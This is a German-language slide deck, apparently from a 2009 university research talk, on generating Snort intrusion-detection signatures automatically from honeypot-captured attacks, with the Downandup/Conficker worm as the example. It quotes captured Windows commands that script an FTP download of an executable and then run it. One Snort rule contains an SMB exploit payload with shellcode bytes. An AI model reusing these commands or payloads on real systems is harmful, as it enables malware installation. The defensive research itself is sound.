140 likes | 295 Views
Automatisches Generieren komplexer Intrusion- Detection -Signaturen. Tillmann Werner Cyber Defence – Schutzlos in einer vernetzten Welt? AFCEA-Informationsveranstaltung 16. Februar 2009. Automatisches Generieren komplexer Intrusion-Detection-Signaturen. Angriffe im Internet.
E N D
Automatisches Generieren komplexerIntrusion-Detection-Signaturen Tillmann Werner CyberDefence – Schutzlos in einer vernetzten Welt? AFCEA-Informationsveranstaltung 16. Februar 2009
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Angriffeim Internet • TypischerAblauf von Angriffen • Scannen von NetzbereichennachangreifbarenRechnern • Automatische, parallelisiereSystemkompromittierung • Download des eigentlichenSchadprogramms • ZusammenschlussübernommenerSystemezuBotnetzen • WeitereAttacken C&C 4 1 3 0wned 2 5 Tillmann Wern er AFCEA: Cyber Defence
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Fallbeispiel: Downandup-Wurm • Fakten • VerbreitetsichautomatischüberNetzwerke • NutztSchwachstelleim Server Service auf Windows-Systemen • LädtSchadprogramm auf kompromittierteMaschinen • Schließtinfizierte Computer zueinemBotnetzzusammen ? • 23.10.2008: Microsoft veröffentlichtaußerplanmäßiges Advisory MS08-067 • 26.10.2008: PoC-Exploits im Internet verfügbar • 04.11.2008: Erste Exploits in SensorenderUniversität Bonn • 21.11.2008: Downandup • 16.01.2009: F-Secure: 9 MillioneninfizierteSystemeweltweit • 20.01.2009: 70 Systemeder Royal Navy befallen (BBC News) • 21.01.2009: Intramarinfizier – Jets derfrz. Marine könnennichtstarten (Telegraph) • 25.01.2009: Pandalabs: 5,77% aller PC infiziert • 07.02.2009: Amtsgericht Houston für 4 Tagelahmgelegt • 12.02.2009: Microsoft setzt 250.000$ Kopfgeldaus • 13.02.2009: Hunderte SystemederBundeswehr befallen (Spiegel Online) Tillmann Wern er AFCEA: Cyber Defence
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Inhalt • Motivation • Sensorik • Signaturgenerierung • Anwendung und Ausblick Tillmann Wern er AFCEA: Cyber Defence
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Motivation • Network Intrusion Detection • SignaturenzurErkennung und Blockade von Angriffen in Netzen • KonzeptuelleEigenschaft: Reaktiv per Definition • Signatur: FormaleBeschreibungspeziellerEigenschaften • DazugenaueKenntnis von Angriffennötig • StändigwechselndeAngriffstrends • ManuellesSignatur-Engineering kannnichtSchritthalten • AutomatisierteAngriffeerfordernautomatisierteGegenmaßnahmen • Signaturgenerierung • Minimierung des ZeitfenstersohneSchutz • Idee: SignaturenausAngriffenberechnen • WeitereAngriffedanndetektierbar Tillmann Wern er AFCEA: Cyber Defence
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Sensorik • Woansetzen? • Schwachstellensind die Angriffsvektoren • Ziel: AbwehrderinitialenAttacke • Anforderungen • ErfassenneuerAngriffstypen und –varianten • VerteilteSensorik, zentraleAuswertung • EntkopplungAngriffserfassung und Signaturgenerierung • Datenerfassungistzeitkritisch • Signaturgenerierungistrechenintensiv • Honeypots • SpezielleOpfer-SystememitdemZiel, angegriffenzuwerden • ErfassenmöglichstvieleInformationenzujedemAngriff • KönnenauchvölligunbekannteAttackenerfassen Tillmann Wern er AFCEA: Cyber Defence
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: Überblick • Generierungsprozess • Sensorenerfassen und übermittelnAngriffsdaten • AutomatischeKlassifizierung • IdentifiziereninvarianterAnteile • Signatur-Komposition • Format-Übersetzung Tillmann Wern er AFCEA: Cyber Defence
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Beispiel cmd /c echo open 192.168.1.100 17713 >> ii &echo user 1 1 >> ii &echo get smc.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &smc.exe cmd /c echo open 0.0.0.0 29221 >> ii &echo user 1 1 >> ii &echo get crsss.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &crsss.exe cmd /c echo open 192.168.176.184 39354 >> ii &echo user 1 1 >> ii &echo get aglopmn.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &aglopmn.exe alert tcp any any -> \$HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1";\ content: "cmd /c echo open "; offset: 0; depth: 17;\ content: "exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &";\ distance: 55; within: 139;\ sid: 2000001; rev: 1;) Tillmann Wern er AFCEA: Cyber Defence
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: AutomatischeKlassifizierung • Angriffsklassen • Ziel: GeneriereeineSignatur pro Angriffsklasse • Klasse: MengeallerähnlichenAngriffe • ÄhnlichkeitdefiniertanhandsyntaktischerMerkmale • AutomatischeKlassifizierung (Clustering) • ClusterneingehenderAngriffeanhandÄhnlichkeit • Graph-basierterAlgorithmus • Zusammenhangskomponentenrepräsentieren Cluster • Online-Verfahren, d.h. neueKlassenwerdenzurLaufzeitgebildet Tillmann Wern er AFCEA: Cyber Defence
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: IdentifiziereninvarianterAnteile • Gemeinsame Substrings • Gesucht: Substrings, die in allenAngriffeneines Clusters vorkommen • DiesestellengemeinsameMerkmaledar • Signatur : Gemeinsame Substrings mitPositionsangaben 2 1 3 • Findenallergemeinsamen Substrings • Algorithmus auf Basis von Generalized Suffix Trees • Speziellfür die Signaturgenerierungentwickelt • Sehreffizient: O(n)bein =SummeallerAngriffsbytes Tillmann Wern er AFCEA: Cyber Defence
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: Komposition und Übersetzung • Signatur-Komposition • Ziel: MöglichstlangeSequenzbilden • Greedy-Algorithmus: Ergänztsukzessivenächstlängsten Substring • Ergebnisnichtnotwendigerweise optimal • EinfachesOptimierenwegenMehrstufigkeit des Verfahrens • Signatur-Übersetzung • GenerierteRoh-Signaturin der Praxis nichteinsetzbar • Snort-Format: De-facto-Standard • Syntax besitzt die benötigteMächtigkeit alert tcp any any -> \$HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1";\ content: "cmd /c echo open "; offset: 0; depth: 17;\ content: "exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &";\ distance: 55; within: 139;\ sid: 2000001; rev: 1;) Tillmann Wern er AFCEA: Cyber Defence
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: Komposition und Übersetzung alert tcp any any -> any any (msg: "nebula rule 2000001 rev. 4"; \ content: "|00 00 85 ff|SMBr|00 00 00 00 18|S|c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00|7|13 00 00 00 00 00|b|00 02|PC NETWORK PROGRAM 1.0|00 02|LANMAN1.0|00 02|Windows for Workgroups 3.1a|00 02|LM1.2X002|00 02| LANMAN2.1|00 02|NT LM 0.12|00 00 00 10 bf ff|SMBs|00 00 00 00 18 07 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00|7|13 00 00 00 00 0c ff 00 00 00 04 11 0a 00 00 00 00 00 00 00|~|10 00 00 00 00 d4 00 00 80|~|10|`|82 10|z|06 06|+|06 01 05 05 02 a0 82 10|n0|82 10|j|a1 82 10|f#|82 10|b|03 82 04 01 00|AAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|03 00|#|82 0c|W|03 82 04 0a 00 90|B|90|B|90|B|90|B|81 c4|T |f2 ff ff fc e8|F|00 00 00 8b|E<|8b 7c 05|x|01 ef 8b|O|18 8b|_ |01 eb e3|.I|8b|4|8b 01 ee|1|c0 99 ac 84 c0 |t|07 c1 ca 0d 01 c2 eb f4|\;T|24 04|u|e3 8b|_|24 01 eb|f|8b 0c|K|8b|_|1c 01 eb 8b 1c 8b 01 eb 89|\\|24 04 c3|1|c0|d|8b|@0|85 c0|x|0f 8b|@|0c 8b|p|1c ad 8b|h|08 e9 0b 00 00 00 8b|@4|05 7c 00 00 00 8b|h<_1|f6|`V|eb 0d|h|ef ce e0|`h|98 fe 8a 0e|W|ff e7 e8 ee ff ff ff|cmd /c echo open "; depth: 1435; offset: 0; \ content: ">> ii &echo user "; distance: 13; within: 1473; \ content: "exe >> ii &echo bye >> ii &ftp -n -v -s\:ii &del ii &"; distance: 17; within: 127; \ content: "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#|0a 03 08 00 f8 0f 01 00 f8 0f 01|#|82 08|9|03 82 04 11 00|CCCC |f0 fd 7f|SVWf|81 ec 80 00 89 e6 e8 ed 00 00 00 ff|6h|09 12 d6|c|e8 f7 00 00 00 89|F|08 e8 a2 00 00 00 ff|v|04|hk|d0|+|ca e8 e2 00 00 00 89|F|0c e8|?|00 00 00 ff|v|04|h|fa 97 02|L|e8 cd 00 00 00|1|db|h|10 04 00 00|S|ff d0 89 c3|V|8b|v|10 89 c7 b9 10 04 00 00 f3 a4|^1|c0|PPPSPP|ff| V|0c 8b|F|08|f|81 c4 80 00|_^[|ff e0|`|e8|#|00 00 00 8b|D|24 0c 8d|X|7c 83|C<|05 81|C(|00 10 00 00 81|c(|0 0 f0 ff ff 8b 04 24 83 c4 14|P1|c0 c3|1|d2|d|ff|2d|89|\"1|db b8 90|B|90|B1|c9 b1 02 89 df f3 af|t|03|C|eb f3 89|~|10|d|8f 02|Xa|c3|`|bf| |f0 fd 7f 8b 1f 8b|F|08 89 07 8b 7f f8 81 c7|x|01 00 00 89 f9|9|19|t|04 8b 09 eb f8 89 fa|9Z|04|t|05 8b|R|04 eb f6 89 11 89|J|04 c6|C|fd 01|a|c3 a1 0c f0 fd 7f 8b|@|1c 8b|X|08 89 1e 8b 00 8b|@|08 89|F|04 c3|`|8b|l|24|(|8b|E<|8b|T|05|x|01 ea 8b|J|18 8b|Z |01 eb e3|8I|8b|4|8b 01 ee|1|ff|1| c0 fc ac|8|e0|t|07 c1 cf 0d 01 c7 eb f4|\;|7c 24 24|u|e1 8b|Z|24 01 eb|f|8b 0c|K|8b|Z|1c 01 eb 8b 04 8b 01 e8 89|D|24 1c|a|c2 08 00 eb fe|CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCC#|82 04| |03 09 00 eb 06 90 90 90 90 90 90 03 82 04 11 00|DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDD|00 00 00 00 00 00|"; distance: 19; within: 2937; \ sid: 2000001; rev: 4;) Tillmann Werner Tillmann Wern er AFCEA: Cyber Defence
Automatisches Generieren komplexer Intrusion-Detection-Signaturen Anwendung und Ausblick • SelbstschützendeNetze • Sensoren, Signatur-Generator und IDS imselbenNetz • NeueRegelbeineuenAngriffswellen • AktuelleherForschungscharacterwegenMissbrauchsgefahr • WerkzeugzurAngriffsanalyse • MethodeauchhilfreichbeimanuellerAngriffsanaylse • SignaturbeschreibtstatischeAnteile • SchnelleresVerständnis von Angriffsdetails • Ausblick • WeitereForschungnötig und möglich • VerbesserunginsbesonderedurchmehrstrukturellesWissenüberAngriffe • Idee: Lernen von DialogstrukturenzwischenAngreifer und Opfer Tillmann Wern er AFCEA: Cyber Defence
Fragen? Tillmann Werner werner@cs.uni-bonn.de Institut für Informatik IV Universität Bonn Römerstraße 164 53117 Bonn